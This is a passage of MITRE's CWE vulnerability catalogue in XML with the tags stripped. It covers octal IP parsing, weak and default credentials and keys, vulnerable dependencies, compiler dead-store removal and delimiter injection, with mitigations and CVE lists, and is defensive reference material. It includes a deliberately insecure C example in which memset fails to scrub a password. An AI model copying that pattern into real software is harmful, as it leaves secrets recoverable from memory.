distract Kelly and his coworkers during business meetings with cute meows, so Kelly monitors Taki's location using a different web site. + Suppose /etc/hosts provides the site info as follows: + + + + taki.example.com 10.1.0.7 + night.example.com 010.1.0.8 + + + The entry for night.example.com has a typo "010" in the first octet. When using ping to ensure the servers are up, the leading 0 causes the IP address to be converted using octal. So when Kelly's script attempts to access night.example.com, it inadvertently scans 8.1.0.8 instead of 10.1.0.8 (since "010" in octal is 8 in decimal), and Night is free to send new Tweets without being immediately detected. + + + + + CVE-2021-29662 + Chain: Use of zero-prepended IP addresses in Perl-based IP validation module can lead to an access control bypass. + https://www.cve.org/CVERecord?id=CVE-2021-29662 + + + CVE-2021-28918 + Chain: Use of zero-prepended IP addresses in a product that manages IP blocks can lead to an SSRF. + https://www.cve.org/CVERecord?id=CVE-2021-28918 + + + CVE-2021-29921 + Chain: Use of zero-prepended IP addresses in a Python standard library package can lead to an SSRF. + https://www.cve.org/CVERecord?id=CVE-2021-29921 + + + CVE-2021-29923 + Chain: Use of zero-prepended IP addresses in the net Golang library can lead to an access control bypass. + https://www.cve.org/CVERecord?id=CVE-2021-29923 + + + CVE-2021-29424 + Chain: Use of zero-prepended IP addresses in Perl netmask module allows bypass of IP-based access control. + https://www.cve.org/CVERecord?id=CVE-2021-29424 + + + CVE-2016-4029 + Chain: incorrect validation of intended decimal-based IP address format (CWE-1286) enables parsing of octal or hexadecimal formats (CWE-1389), allowing bypass of an SSRF protection mechanism (CWE-918). + https://www.cve.org/CVERecord?id=CVE-2016-4029 + + + CVE-2020-13776 + Mishandling of hex-valued usernames leads to unexpected decimal conversion and privilege escalation in the systemd Linux suite. + https://www.cve.org/CVERecord?id=CVE-2020-13776 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous External Contributor + 2021-05-28 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an authentication mechanism to restrict access to specific users or identities, but the mechanism does not sufficiently prove that the claimed identity is correct. + + Attackers may be able to bypass weak authentication faster and/or with less effort than expected. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Confidentiality + Availability + Access Control + Read Application Data + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code. + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple OT products used weak authentication. + + + + + CVE-2022-30034 + Chain: Web UI for a Python RPC framework does not use regex anchors to validate user login emails (CWE-777), potentially allowing bypass of OAuth (CWE-1390). + https://www.cve.org/CVERecord?id=CVE-2022-30034 + + + CVE-2021-3116 + Chain: Python-based HTTP Proxy server uses the wrong boolean operators (CWE-480) causing an incorrect comparison (CWE-697) that identifies an authN failure if all three conditions are met instead of only one, allowing bypass of the proxy authentication (CWE-1390) + https://www.cve.org/CVERecord?id=CVE-2021-3116 + + + CVE-2022-29965 + Distributed Control System (DCS) uses a deterministic algorithm to generate utility passwords + https://www.cve.org/CVERecord?id=CVE-2022-29965 + + + CVE-2022-29959 + Initialization file contains credentials that can be decoded using a "simple string transformation" + https://www.cve.org/CVERecord?id=CVE-2022-29959 + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2022-10-05 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker. + + By design, authentication protocols try to ensure that attackers must perform brute force attacks if they do not know the credentials such as a key or password. However, when these credentials are easily predictable or even fixed (as with default or hard-coded passwords and keys), then the attacker can defeat the mechanism without relying on brute force. + Credentials may be weak for different reasons, such as: + + Hard-coded (i.e., static and unchangeable by the administrator) + Default (i.e., the same static value across different deployments/installations, but able to be changed by the administrator) + Predictable (i.e., generated in a way that produces unique credentials across deployments/installations, but can still be guessed with reasonable efficiency) + + Even if a new, unique credential is intended to be generated for each product installation, if the generation is predictable, then that may also simplify guessing attacks. + + + + + + + + + + + + + + Requirements + + + Architecture and Design + + + Installation + + + Operation + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple OT products used weak credentials. + + + + + CVE-2022-30270 + Remote Terminal Unit (RTU) uses default credentials for some SSH accounts + https://www.cve.org/CVERecord?id=CVE-2022-30270 + + + CVE-2022-29965 + Distributed Control System (DCS) uses a deterministic algorithm to generate utility passwords + https://www.cve.org/CVERecord?id=CVE-2022-29965 + + + CVE-2022-30271 + Remote Terminal Unit (RTU) uses a hard-coded SSH private key that is likely to be used in typical deployments + https://www.cve.org/CVERecord?id=CVE-2022-30271 + + + CVE-2021-38759 + microcontroller board has default password, allowing admin access + https://www.cve.org/CVERecord?id=CVE-2021-38759 + + + CVE-2021-41192 + data visualization/sharing package uses default secret keys or cookie values if they are not specified in environment variables + https://www.cve.org/CVERecord?id=CVE-2021-41192 + + + CVE-2020-27020 + password manager does not generate cryptographically strong passwords, allowing prediction of passwords using guessable details such as time of generation + https://www.cve.org/CVERecord?id=CVE-2020-27020 + + + CVE-2020-8632 + password generator for cloud application has small length value, making it easier for brute-force guessing + https://www.cve.org/CVERecord?id=CVE-2020-8632 + + + CVE-2020-5365 + network-attached storage (NAS) system has predictable default passwords for a diagnostics/support account + https://www.cve.org/CVERecord?id=CVE-2020-5365 + + + CVE-2020-5248 + IT asset management app has a default encryption key that is the same across installations + https://www.cve.org/CVERecord?id=CVE-2020-5248 + + + CVE-2012-3503 + Installation script has a hard-coded secret token value, allowing attackers to bypass authentication + https://www.cve.org/CVERecord?id=CVE-2012-3503 + + + CVE-2010-2306 + Intrusion Detection System (IDS) uses the same static, private SSL keys for multiple devices and installations, allowing decryption of SSL traffic + https://www.cve.org/CVERecord?id=CVE-2010-2306 + + + CVE-2001-0618 + Residential gateway uses the last 5 digits of the 'Network Name' or SSID as the default WEP key, which allows attackers to get the key by sniffing the SSID, which is sent in the clear + https://www.cve.org/CVERecord?id=CVE-2001-0618 + + + + + Part 2-4 + Req SP.09.02 RE(1) + + + Part 4-1 + Req SR-3 b) + + + Part 4-1 + Req SI-2 b) + + + Part 4-1 + Req SI-2 d) + + + Part 4-1 + Req SG-3 d) + + + Part 4-1 + Req SG-6 b) + + + Part 4-2 + Req CR 1.1 + + + Part 4-2 + Req CR 1.2 + + + Part 4-2 + Req CR 1.5 + + + Part 4-2 + Req CR 1.7 + + + Part 4-2 + Req CR 1.8 + + + Part 4-2 + Req CR 1.9 + + + Part 4-2 + Req CR 1.14 + + + Part 4-2 + Req CR 2.1 + + + Part 4-2 + Req CR 4.3 + + + Part 4-2 + Req CR 7.5 + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2022-10-06 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested mappings to ISA/IEC 62443. + + + + + The product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality. + + It is common practice for products to be designed to use + default keys, passwords, or other mechanisms for + authentication. The rationale is to simplify the + manufacturing process or the system administrator's task of + installation and deployment into an enterprise. However, if + admins do not change the defaults, it is easier for attackers + to bypass authentication quickly across multiple + organizations. + + + + + + + + + + + + + + Architecture and Design + + + + + Authentication + Gain Privileges or Assume Identity + + + + + Requirements + Prohibit use of default, hard-coded, or other values that do not vary for each installation of the product - especially for separate organizations. + High + + + Architecture and Design + Force the administrator to change the credential upon installation. + High + + + Installation + Operation + The product administrator could change the defaults upon installation or during operation. + Moderate + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + At least one OT product used default credentials. + + + + + CVE-2022-30270 + Remote Terminal Unit (RTU) uses default credentials for some SSH accounts + https://www.cve.org/CVERecord?id=CVE-2022-30270 + + + CVE-2021-41192 + data visualization/sharing package uses default secret keys or cookie values if they are not specified in environment variables + https://www.cve.org/CVERecord?id=CVE-2021-41192 + + + CVE-2021-38759 + microcontroller board has default password + https://www.cve.org/CVERecord?id=CVE-2021-38759 + + + CVE-2010-2306 + Intrusion Detection System (IDS) uses the same static, private SSL keys for multiple devices and installations, allowing decryption of SSL traffic + https://www.cve.org/CVERecord?id=CVE-2010-2306 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2022-10-07 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses default passwords for potentially critical functionality. + + It is common practice for products to be designed to use + default passwords for authentication. The rationale is to + simplify the manufacturing process or the system + administrator's task of installation and deployment into an + enterprise. However, if admins do not change the defaults, + then it makes it easier for attackers to quickly bypass + authentication across multiple organizations. There are many + lists of default passwords and default-password scanning tools + that are easily available from the World Wide Web. + + + + + + + + + + + + + + Architecture and Design + + + + + Authentication + Gain Privileges or Assume Identity + + + + + Requirements + Prohibit use of default, hard-coded, or other values that do not vary for each installation of the product - especially for separate organizations. + High + + + Documentation + Ensure that product documentation clearly emphasizes the presence of default passwords and provides steps for the administrator to change them. + Limited + + + Architecture and Design + Force the administrator to change the credential upon installation. + High + + + Installation + Operation + The product administrator could change the defaults upon installation or during operation. + Moderate + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple OT products used default credentials. + + + + + CVE-2022-30270 + Remote Terminal Unit (RTU) uses default credentials for some SSH accounts + https://www.cve.org/CVERecord?id=CVE-2022-30270 + + + CVE-2022-2336 + OPC Unified Architecture (OPC UA) industrial automation product has a default password + https://www.cve.org/CVERecord?id=CVE-2022-2336 + + + CVE-2021-38759 + microcontroller board has default password + https://www.cve.org/CVERecord?id=CVE-2021-38759 + + + CVE-2021-44480 + children's smart watch has default passwords allowing attackers to send SMS commands and listen to the device's surroundings + https://www.cve.org/CVERecord?id=CVE-2021-44480 + + + CVE-2020-11624 + surveillance camera has default password for the admin account + https://www.cve.org/CVERecord?id=CVE-2020-11624 + + + CVE-2018-15719 + medical dental records product installs a MySQL database with a blank default password + https://www.cve.org/CVERecord?id=CVE-2018-15719 + + + CVE-2014-9736 + healthcare system for archiving patient images has default passwords for key management and storage databases + https://www.cve.org/CVERecord?id=CVE-2014-9736 + + + CVE-2000-1209 + database product installs admin account with default null password, allowing privileges, as exploited by various worms + https://www.cve.org/CVERecord?id=CVE-2000-1209 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2022-10-07 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product uses a default cryptographic key for potentially critical functionality. + + It is common practice for products to be designed to use + default keys. The rationale is to simplify the manufacturing + process or the system administrator's task of installation and + deployment into an enterprise. However, if admins do not + change the defaults, it is easier for attackers to bypass + authentication quickly across multiple organizations. + + + + + + + + + + + + + Architecture and Design + + + + + Authentication + Gain Privileges or Assume Identity + + + + + Requirements + Prohibit use of default, hard-coded, or other values that do not vary for each installation of the product - especially for separate organizations. + High + + + Architecture and Design + Force the administrator to change the credential upon installation. + High + + + Installation + Operation + The product administrator could change the defaults upon installation or during operation. + Moderate + + + + + CVE-2018-3825 + cloud cluster management product has a default master encryption key + https://www.cve.org/CVERecord?id=CVE-2018-3825 + + + CVE-2016-1561 + backup storage product has a default SSH public key in the authorized_keys file, allowing root access + https://www.cve.org/CVERecord?id=CVE-2016-1561 + + + CVE-2010-2306 + Intrusion Detection System (IDS) uses the same static, private SSL keys for multiple devices and installations, allowing decryption of SSL traffic + https://www.cve.org/CVERecord?id=CVE-2010-2306 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2022-10-07 + 4.9 + 2022-10-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product has a dependency on a third-party component that contains one or more known vulnerabilities. + + Many products are large enough or complex enough that part of their functionality uses libraries, modules, or other intellectual property developed by third parties who are not the product creator. For example, even an entire operating system might be from a third-party supplier in some hardware products. Whether open or closed source, these components may contain publicly known vulnerabilities that could be exploited by adversaries to compromise the product. + + + + + + + + + + + + + Architecture and Design + The product architect or designer might choose a component that is already known to contain vulnerabilities or has a high likelihood of containing vulnerabilities in the future. + + + Implementation + For reasons of compatibility or stability, developers might choose a third-party component, such as a library, that is already known to contain vulnerabilities. + + + Patching and Maintenance + Since all products contain vulnerabilities, over time, a third-party component will be discovered to have a vulnerability. + + + + + Confidentiality + Integrity + Availability + Varies by Context + The consequences vary widely, depending on the vulnerabilities that exist in the component; how those vulnerabilities can be "reached" by adversaries, as the exploitation paths and attack surface will vary depending on how the component is used; and the criticality of the privilege levels and features for which the product relies on the component. + + + + + Automated Analysis + For software, use Software Composition Analysis (SCA) tools, which automatically analyze products to identify third-party dependencies. Often, SCA tools can be used to link with known vulnerabilities in the dependencies that they detect. There are commercial and open-source alternatives, such as OWASP Dependency-Check [REF-1312]. Many languages or frameworks have package managers with similar capabilities, such as npm audit for JavaScript, pip-audit for Python, govulncheck for Go, and many others. Dynamic methods can detect loading of third-party components. + High + Software Composition Analysis (SCA) tools face a number of technical challenges that can lead to false positives and false negatives. Dynamic methods have other technical challenges. + + + + + Requirements + Policy + In some industries such as healthcare [REF-1320] [REF-1322] or technologies such as the cloud [REF-1321], it might be unclear about who is responsible for applying patches for third-party vulnerabilities: the vendor, the operator/customer, or a separate service. Clarifying roles and responsibilities can be important to minimize confusion or unnecessary delay when third-party vulnerabilities are disclosed. + + + Requirements + Require a Bill of Materials for all components and sub-components of the product. For software, require a Software Bill of Materials (SBOM) [REF-1247] [REF-1311]. + + + Architecture and Design + Implementation + Integration + Manufacturing + Maintain a Bill of Materials for all components and sub-components of the product. For software, maintain a Software Bill of Materials (SBOM). According to [REF-1247], "An SBOM is a formal, machine-readable inventory of software components and dependencies, information about those components, and their hierarchical relationships." + + + Operation + Patching and Maintenance + Actively monitor when a third-party component vendor announces vulnerability patches; fix the third-party component as soon as possible; and make it easy for operators/customers to obtain and apply the patch. + + + Operation + Patching and Maintenance + Continuously monitor changes in each of the product's components, especially when the changes indicate new vulnerabilities, end-of-life (EOL) plans, etc. + + + + + The "SweynTooth" vulnerabilities in Bluetooth Low Energy (BLE) software development kits (SDK) were found to affect multiple Bluetooth System-on-Chip (SoC) manufacturers. These SoCs were used by many products such as medical devices, Smart Home devices, wearables, and other IoT devices. [REF-1314] [REF-1315] + + + log4j, a Java-based logging framework, is used in a large number of products, with estimates in the range of 3 billion affected devices [REF-1317]. When the "log4shell" (CVE-2021-44228) vulnerability was initially announced, it was actively exploited for remote code execution, requiring urgent mitigation in many organizations. However, it was unclear how many products were affected, as Log4j would sometimes be part of a long sequence of transitive dependencies. [REF-1316] + + + + + Part 4-2 + Req CR 2.4 + + + Part 4-2 + Req CR 6.2 + + + Part 4-2 + Req CR 7.2 + + + Part 4-1 + Req SM-9 + + + Part 4-1 + Req SM-10 + + + Part 4-1 + Req SR-2 + + + Part 4-1 + Req DM-1 + + + Part 4-1 + Req DM-3 + + + Part 4-1 + Req DM-4 + + + Part 4-1 + Req SVV-1 + + + Part 4-1 + Req SVV-3 + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2023-01-25 + 4.10 + 2023-01-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + Samreen Arshad + Balochistan University of Information Technology, Engineering and Management Sciences + 2022-04-18 + Submitted a request for coverage of "Vulnerable and Outdated Components" + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested mappings to ISA/IEC 62443. + + + + + Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal." + + This compiler optimization error occurs when: + + 1. Secret data are stored in memory. + 2. The secret data are scrubbed from memory by overwriting its contents. + 3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently. + + + + + + + + + + + + Implementation + + + Build and Compilation + + + + + Confidentiality + Access Control + Read Memory + Bypass Protection Mechanism + This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms. + + + + + Black Box + This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others. + + + White Box + This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler. + + + + + Implementation + Store the sensitive data in a "volatile" memory location if available. + + + Build and Compilation + If possible, configure your compiler so that it does not remove dead stores. + + + Architecture and Design + Where possible, encrypt sensitive data that are used by a software system. + + + + + The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset(). + + void GetData(char *MFAddr) { + char pwd[64];if (GetPasswordFromUser(pwd, sizeof(pwd))) { + + if (ConnectToMainframe(MFAddr, pwd)) { + + + // Interaction with mainframe + + + } + }memset(pwd, 0, sizeof(pwd)); + } + + The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system. + It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency. + Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts. + + + + Memory + + + + Insecure Compiler Optimization + + + Sensitive memory uncleared by compiler optimization + + + A8 + Insecure Storage + CWE More Specific + + + MSC06-C + Be aware of compiler optimization when dealing with sensitive data + + + SFP23 + Exposed Data + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insecure Compiler Optimization + + + + The product does not neutralize or incorrectly neutralizes delimiters. + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + Input Validation + Developers should anticipate that delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Delimiter Problems + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Delimiter Problems + Failure to Sanitize Delimiters + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component. + As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that parameter/argument delimiters will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2003-0307 + Attacker inserts field separator into input to specify admin privileges. + https://www.cve.org/CVERecord?id=CVE-2003-0307 + + + + + Parameter Delimiter + + + SFP24 + Tainted input to command + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes 